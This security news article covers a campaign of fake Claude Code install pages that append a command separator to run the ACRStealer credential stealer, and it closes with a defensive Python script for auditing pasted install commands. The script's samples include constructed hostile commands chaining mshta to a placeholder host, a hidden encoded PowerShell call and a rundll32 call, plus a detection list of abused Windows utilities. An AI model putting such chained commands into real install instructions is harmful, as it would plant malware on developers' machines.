Fake Claude Code Installers Deliver Credential-Stealing Malware

eSecurity Planet, Jun 1, 2026

Why It Matters

The campaign directly threatens the integrity of AI development pipelines by stealing high-value API credentials and crypto assets, potentially exposing proprietary models and cloud resources. Organizations must adapt security controls to verify installation sources and protect against supply-chain-style attacks that arrive through copy-pasted install commands rather than through a compromised package.

Key Takeaways

  • 88+ fake domains impersonate Claude Code and other AI platforms.
  • SEO poisoning and Google ads push malicious install pages to top.
  • Hidden command separators execute ACRStealer alongside legitimate installations.
  • Malware steals API keys, tokens, crypto wallets, and passwords.

Pulse Analysis

The rapid adoption of AI-assisted development tools has created a lucrative attack surface for cybercriminals. Threat actors are now counterfeiting the documentation pages developers rely on, using SEO poisoning and paid search placements to surface fake Claude Code install pages at the top of results. By appending a command separator, such as an ampersand, to an otherwise benign installation string, they run the ACRStealer loader while the legitimate software still installs, so the developer sees the expected outcome and the compromise goes unnoticed.

Technical analysis reveals a multi-stage infection chain. Initial delivery leverages common Windows utilities such as rundll32.exe and mshta.exe, as well as Base64-encoded scripts hosted on GitHub. Once executed, the payload establishes encrypted C2 channels, relies on fileless execution techniques, and activates anti-analysis safeguards. ACRStealer, the core trojan, has evolved to harvest a broad spectrum of credentials: AI platform API keys, cloud service tokens, password-manager vaults, and VPN logins, and it runs a clipboard hijacker that watches for cryptocurrency wallet addresses. Its ability to rotate delivery methods and infrastructure makes traditional signature-based defenses less effective.

Mitigating this emerging threat requires a layered approach. Developers should verify installation commands against the official vendor site, paste them into an editor rather than straight into a terminal, and scrutinize any unexpected operators (ampersands, pipes, semicolons) or extra executables before running them. Organizations ought to enforce application control, deploy endpoint detection and response solutions capable of spotting abnormal script activity such as mshta.exe or rundll32.exe spawned from a package-manager session, and adopt least-privilege principles with robust privileged-access management. Centralized secrets management, continuous scanning for exposed keys, and zero-trust network architectures further reduce the blast radius if a workstation is compromised. By integrating these controls, enterprises can safeguard their AI assets and maintain the integrity of their development pipelines.
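The check recommended above, turned into a small pre-flight audit for a copied install command. This is an added example and is not code from the article, from eSecurity Planet or from Anthropic. It splits the command on separators that appear outside quotes (the ampersand trick the article describes, plus pipes, semicolons and shell substitution), flags the Windows utilities the article names (rundll32, mshta) and a few other well-known living-off-the-land binaries (my addition, not from the article), flags encoded-command flags and long Base64 blobs, and flags invisible or non-ASCII characters that could hide a separator or a lookalike domain in pasted text. The sample commands are constructed for the demo; the npm package name is my assumption of the legitimate Claude Code package and should be checked against the vendor's documentation, and `example.invalid` is a reserved placeholder domain.

```python
"""Pre-flight audit of a copy-pasted install command.

Added example (not the article's or Anthropic's code). Sample commands are
constructed to mimic the pattern the article describes: a legitimate install
string with a separator and an extra stage appended.
"""
import re
import unicodedata

# Tokens that start a second command in cmd.exe, PowerShell or POSIX sh.
# Two-character forms come first so "&&" is not read as two "&".
SEPARATORS = ("&&", "||", "&", "|", ";", "\n", "`", "$(")

# rundll32 and mshta are named in the article; the rest are common LOLBins
# added here as an assumption from general experience.
LOLBINS = ("rundll32", "mshta", "regsvr32", "certutil", "bitsadmin",
           "wscript", "cscript")

ENCODED_FLAGS = re.compile(
    r"(?i)(?:-|/)(?:e|ec|enc|encodedcommand)\b|frombase64string|\biex\b|invoke-expression")
BASE64_BLOB = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")

# Constructed samples. The package name is assumed to be the legitimate one;
# verify against the vendor's docs before trusting any install string.
SAMPLE_COMMANDS = {
    "clean": "npm install -g @anthropic-ai/claude-code",
    "chained_mshta": "npm install -g @anthropic-ai/claude-code & mshta https://example.invalid/u.hta",
    "encoded_ps": "npm install -g @anthropic-ai/claude-code && powershell -w hidden -enc " + "Q" * 48,
    "zero_width": "npm install -g @anthropic-ai/claude-code\u200b; rundll32 x.dll,Run",
}


def split_commands(cmd):
    """Split cmd on separators found outside single/double quotes.

    Returns (segments, separators): segments[i+1] is what separators[i] chains on.
    """
    segments, seps, buf, quote, i = [], [], [], None, 0
    while i < len(cmd):
        ch = cmd[i]
        if quote:                      # inside a quoted string: copy verbatim
            buf.append(ch)
            if ch == quote:
                quote = None
            i += 1
            continue
        if ch in "\"'":
            quote = ch
            buf.append(ch)
            i += 1
            continue
        sep = next((s for s in SEPARATORS if cmd.startswith(s, i)), None)
        if sep:
            segments.append("".join(buf).strip())
            seps.append(sep)
            buf, i = [], i + len(sep)
            continue
        buf.append(ch)
        i += 1
    segments.append("".join(buf).strip())
    return segments, seps


def audit_install_command(cmd):
    """Return segments, a list of (kind, detail) findings and a verdict."""
    findings = []
    # 1. Invisible (Cf) or non-ASCII characters: hidden separators, homoglyph domains.
    for idx, ch in enumerate(cmd):
        if ord(ch) > 127 or unicodedata.category(ch) == "Cf":
            findings.append(("hidden_char", f"U+{ord(ch):04X} at offset {idx}"))
    # 2. Any separator means more than the install will run.
    segments, seps = split_commands(cmd)
    for sep, extra in zip(seps, segments[1:]):
        findings.append(("separator", f"{sep!r} chains: {extra}"))
    # 3. LOLBins, encoded-command flags and Base64 blobs anywhere in the string.
    lower = cmd.lower()
    for name in LOLBINS:
        if re.search(rf"\b{name}(?:\.exe)?\b", lower):
            findings.append(("lolbin", name))
    m = ENCODED_FLAGS.search(cmd)
    if m:
        findings.append(("encoded_exec", m.group(0)))
    for blob in BASE64_BLOB.findall(cmd):
        findings.append(("base64_blob", blob[:24] + "..."))
    verdict = "run" if not findings else "do not run"
    return {"segments": segments, "findings": findings, "verdict": verdict}


if __name__ == "__main__":
    for label, cmd in SAMPLE_COMMANDS.items():
        result = audit_install_command(cmd)
        print(f"[{label}] {result['verdict']}")
        for kind, detail in result["findings"]:
            print(f"    {kind}: {detail}")
```

A plain `curl ... | sh` style install will also be flagged, because the pipe hands remote content to a shell; that is intentional, since the point of the audit is to make every extra execution path visible before the developer decides to proceed.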
